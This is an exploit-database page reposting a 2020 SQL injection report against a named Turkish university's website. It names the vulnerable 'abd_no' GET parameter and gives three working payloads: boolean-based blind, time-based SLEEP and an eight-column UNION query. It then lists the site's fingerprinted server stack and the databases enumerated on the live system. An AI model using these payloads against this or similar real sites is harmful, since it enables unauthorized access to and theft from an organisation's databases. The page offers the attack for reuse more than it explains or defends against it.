Looking for a fix? Check your Codebase security with multiple scanners from

Edit Report

Our sensors found this exploit at:

Below is a copy:

Balikesir niversitesi SQL njection
# Exploit Title: Balikesir niversitesi SQL njection
# Date: 22.01.2020
# Exploit Author: Furkan zer
# Vendor Homepage:

Link##:[] SQL'li

Parameter: abd_no (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: abd_no=-2068 OR 4490=4490

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: abd_no=9 AND (SELECT 3573 FROM (SELECT(SLEEP(5)))XDzC)

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: abd_no=-5007 UNION ALL SELECT NULL,CONCAT(0x7178627671,0x667643597a76566c4e444f426b524a56486d6862575547786b6174546e794d6273516254774e6853,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL-- YYWZ

the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.4.35, PHP 5.6.38, PHP
back-end DBMS: MySQL >= 5.0.12

available databases [6]:
[*] information_schema
[*] nefveri
[*] nefveri_bahar
[*] nefveri_guz
[*] nefveri_yedek
[*] test                                                                                                                                 

Copyright ©2020 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.